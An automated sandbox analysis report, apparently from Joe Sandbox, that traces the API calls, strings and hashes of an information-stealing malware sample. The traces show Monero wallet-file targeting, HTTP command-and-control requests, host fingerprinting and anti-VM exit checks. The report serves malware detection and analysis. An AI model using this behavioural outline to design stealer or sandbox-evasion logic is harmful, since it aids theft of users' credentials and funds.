lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00CF0DDE,00000000,?,?,00000000,?,",00000000,?,0159E490), ref: 00CD4E38
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00CD4E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CD4E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CD4E99
InternetCloseHandle.WININET(00000000), ref: 00CD4EFD
InternetCloseHandle.WININET(00000000), ref: 00CD4F15
HttpOpenRequestA.WININET(00000000,0159E560,?,0159D9F8,00000000,00000000,00400100,00000000), ref: 00CD4B65

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

InternetCloseHandle.WININET(00000000), ref: 00CD4F1F

Strings

", xrefs: 00CD4C42
", xrefs: 00CD4D83
------, xrefs: 00CD4CB9
------, xrefs: 00CD4B78
------, xrefs: 00CD4A0D

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 09b2a5eea2709f7ebaf1201ce35935108fbb01ba5fe162d56abe90ac9eab6bd0
Instruction ID: b80aa7ca85ea7d66d9207cc03aaf3f58a6e38c1c2c948713d7b246ad2d48a84b
Opcode Fuzzy Hash: 09b2a5eea2709f7ebaf1201ce35935108fbb01ba5fe162d56abe90ac9eab6bd0
Instruction Fuzzy Hash: FE12DA72910258AFCB15EB91DDA2FEEB379AF14300F5141A9B10662191EF707F48DF62

Function 00CE5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CEAB30: lstrlen.KERNEL32(00CD4F55,?,?,00CD4F55,00CF0DDF), ref: 00CEAB3B
Part of subcall function 00CEAB30: lstrcpy.KERNEL32(00CF0DDF,00000000), ref: 00CEAB95

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CE5894
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CE58F1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CE5AA7

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

Part of subcall function 00CE5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CE5478

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Part of subcall function 00CE5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CE5568
Part of subcall function 00CE5510: lstrlen.KERNEL32(00000000), ref: 00CE557F
Part of subcall function 00CE5510: StrStrA.SHLWAPI(00000000,00000000), ref: 00CE55B4
Part of subcall function 00CE5510: lstrlen.KERNEL32(00000000), ref: 00CE55D3
Part of subcall function 00CE5510: lstrlen.KERNEL32(00000000), ref: 00CE55FE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CE59DB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CE5B90
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CE5C5C
Sleep.KERNEL32(0000EA60), ref: 00CE5C6B

Strings

ERROR, xrefs: 00CE59CD
ERROR, xrefs: 00CE5C4E
ERROR, xrefs: 00CE5B82
ERROR, xrefs: 00CE58E3
ERROR, xrefs: 00CE5A99
ERROR, xrefs: 00CE5886

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 5559d8f280abe6bbab53262057612b08ed67dd0a222898d873ac69f521cafd2f
Instruction ID: 847e7bf98685c8905ef037892390fcd77f58ce3102dff84aaf095b3d007e1601
Opcode Fuzzy Hash: 5559d8f280abe6bbab53262057612b08ed67dd0a222898d873ac69f521cafd2f
Instruction Fuzzy Hash: 4CE12D72D10148AFCB14FBA1EDA2EFD737DAF54300F548568B50666191EF346B08EBA2

Function 00CE19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 00CE1A15
ExitProcess.KERNEL32 ref: 00CE1A21

Strings

block, xrefs: 00CE1A07

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 19ee0daf0b993c51bcf78770ad1336777973deec2e5073f18df66efe225eb123
Instruction ID: 8e1977172a3f9a8df968d73d6e613728c4a88b0a219f28522c3bb854453c6f3a
Opcode Fuzzy Hash: 19ee0daf0b993c51bcf78770ad1336777973deec2e5073f18df66efe225eb123
Instruction Fuzzy Hash: F5514BB4B0824DEFCB04DFA6D944FAE77B9EF44704F244058E912AB241E770EA50DB62

Function 00CE6C90 Relevance: 9.1, APIs: 6, Instructions: 89
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,015907C8), ref: 00CE9BF1
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,015907E0), ref: 00CE9C0A
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,01590810), ref: 00CE9C22
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,01590840), ref: 00CE9C3A
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,01590828), ref: 00CE9C53
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,01598AB0), ref: 00CE9C6B
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,01586680), ref: 00CE9C83
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,01586740), ref: 00CE9C9C
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,01590588), ref: 00CE9CB4
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,015905B8), ref: 00CE9CCC
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,015905D0), ref: 00CE9CE5
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,01590630), ref: 00CE9CFD
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,01586980), ref: 00CE9D15
Part of subcall function 00CE9BB0: GetProcAddress.KERNEL32(75900000,01590648), ref: 00CE9D2E

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CD11D0: ExitProcess.KERNEL32 ref: 00CD1211

Part of subcall function 00CD1160: GetSystemInfo.KERNEL32(?), ref: 00CD116A
Part of subcall function 00CD1160: ExitProcess.KERNEL32 ref: 00CD117E

Part of subcall function 00CD1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00CD112B
Part of subcall function 00CD1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00CD1132
Part of subcall function 00CD1110: ExitProcess.KERNEL32 ref: 00CD1143

Part of subcall function 00CD1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00CD123E
Part of subcall function 00CD1220: __aulldiv.LIBCMT ref: 00CD1258
Part of subcall function 00CD1220: __aulldiv.LIBCMT ref: 00CD1266
Part of subcall function 00CD1220: ExitProcess.KERNEL32 ref: 00CD1294

Part of subcall function 00CE6A10: GetUserDefaultLangID.KERNEL32 ref: 00CE6A14

Part of subcall function 00CD1190: ExitProcess.KERNEL32 ref: 00CD11C6

Part of subcall function 00CE79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CD11B7), ref: 00CE7A10
Part of subcall function 00CE79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00CE7A17
Part of subcall function 00CE79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CE7A2F

Part of subcall function 00CE7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CE7AA0
Part of subcall function 00CE7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00CE7AA7
Part of subcall function 00CE7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00CE7ABF

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01598AA0,?,00CF10F4,?,00000000,?,00CF10F8,?,00000000,00CF0AF3), ref: 00CE6D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CE6D88
CloseHandle.KERNEL32(00000000), ref: 00CE6D99
Sleep.KERNEL32(00001770), ref: 00CE6DA4
CloseHandle.KERNEL32(?,00000000,?,01598AA0,?,00CF10F4,?,00000000,?,00CF10F8,?,00000000,00CF0AF3), ref: 00CE6DBA
ExitProcess.KERNEL32 ref: 00CE6DC2

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: f0022dfc6bd448d4d165504c17a4806330125903a6a4131a71be3ecb2a02acbc
Instruction ID: 9e1293feb685ad8229fde5a62043aab3ca86cf9016f0ec01f30a4dab3dd416fd
Opcode Fuzzy Hash: f0022dfc6bd448d4d165504c17a4806330125903a6a4131a71be3ecb2a02acbc
Instruction Fuzzy Hash: 92314871E14248AFCB04FBF2DC56EBE7379AF10340F140929F612A6192DF706A05EA62

Function 00CD1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00CD123E
__aulldiv.LIBCMT ref: 00CD1258
__aulldiv.LIBCMT ref: 00CD1266
ExitProcess.KERNEL32 ref: 00CD1294

Strings

@, xrefs: 00CD1233

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 3baa98bf36bf6b5c478b44cd17184fb5f678b1415f163c74a3086bf97d62aab0
Instruction ID: 4ed5d6269fad9730675da5e8703087fd6747b22ab44d40de4ee88f7ba5395ae5
Opcode Fuzzy Hash: 3baa98bf36bf6b5c478b44cd17184fb5f678b1415f163c74a3086bf97d62aab0
Instruction Fuzzy Hash: 87016DF0D80308BBEF10EFE0CC4ABAEBB78AB14705F248449EB05B62C0D77556459769

Function 00CE6D93 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01598AA0,?,00CF10F4,?,00000000,?,00CF10F8,?,00000000,00CF0AF3), ref: 00CE6D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CE6D88
CloseHandle.KERNEL32(00000000), ref: 00CE6D99
Sleep.KERNEL32(00001770), ref: 00CE6DA4
CloseHandle.KERNEL32(?,00000000,?,01598AA0,?,00CF10F4,?,00000000,?,00CF10F8,?,00000000,00CF0AF3), ref: 00CE6DBA
ExitProcess.KERNEL32 ref: 00CE6DC2

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 72db537e32d1edf6b71fc714fc5fa00a9b809160ea6319d06519a29ba55da181
Instruction ID: 911b7d9d8dc187a7b0eda74cd48776a5d8e12034c60aa7f8ec0626b9641957f7
Opcode Fuzzy Hash: 72db537e32d1edf6b71fc714fc5fa00a9b809160ea6319d06519a29ba55da181
Instruction Fuzzy Hash: 6DF05870B5838DEFEB00BBA2DC0ABBE33B4AF24B81F504515B512A51D1CBB06700EA61

Function 00CD4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CD4889
InternetCrackUrlA.WININET(00000000,00000000), ref: 00CD4899

Strings

<, xrefs: 00CD4819

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: bb8dee7b5a91656d68d4516293476c83e7ac5bdcdf9c4d85d31cbb8d3ed14916
Instruction ID: f4395cbb84a07be0770a0fa8cf4fd1552038616a7fe1ed79bb2e75edcd2efeeb
Opcode Fuzzy Hash: bb8dee7b5a91656d68d4516293476c83e7ac5bdcdf9c4d85d31cbb8d3ed14916
Instruction Fuzzy Hash: B7216FB1D00208ABDF10EFA5EC46ADE7B74FB05320F108625F915A72D0EB706A09CF81

Function 00CE5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

Part of subcall function 00CD62D0: InternetOpenA.WININET(00CF0DFF,00000001,00000000,00000000,00000000), ref: 00CD6331
Part of subcall function 00CD62D0: StrCmpCA.SHLWAPI(?,0159E410), ref: 00CD6353
Part of subcall function 00CD62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CD6385
Part of subcall function 00CD62D0: HttpOpenRequestA.WININET(00000000,GET,?,0159D9F8,00000000,00000000,00400100,00000000), ref: 00CD63D5
Part of subcall function 00CD62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CD640F
Part of subcall function 00CD62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CD6421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CE5478

Strings

ERROR, xrefs: 00CE54C3
ERROR, xrefs: 00CE546A

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 3369a59c356ae13cf288b40eeb39296d36dadb589898675dfaf7b45e8f89f4b1
Instruction ID: c7722eb54236cb3ed0f97013d5224cfcfb4d7e0ad2e6ba775d65154a08b9ab46
Opcode Fuzzy Hash: 3369a59c356ae13cf288b40eeb39296d36dadb589898675dfaf7b45e8f89f4b1
Instruction Fuzzy Hash: 4E113031900188AFCB14FFA5DDA2AED7739AF10340F414568F91A57592EF30BB04EA92

Function 00CE7A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CE7AA0
RtlAllocateHeap.NTDLL(00000000), ref: 00CE7AA7
GetComputerNameA.KERNEL32(?,00000104), ref: 00CE7ABF

Memory Dump Source

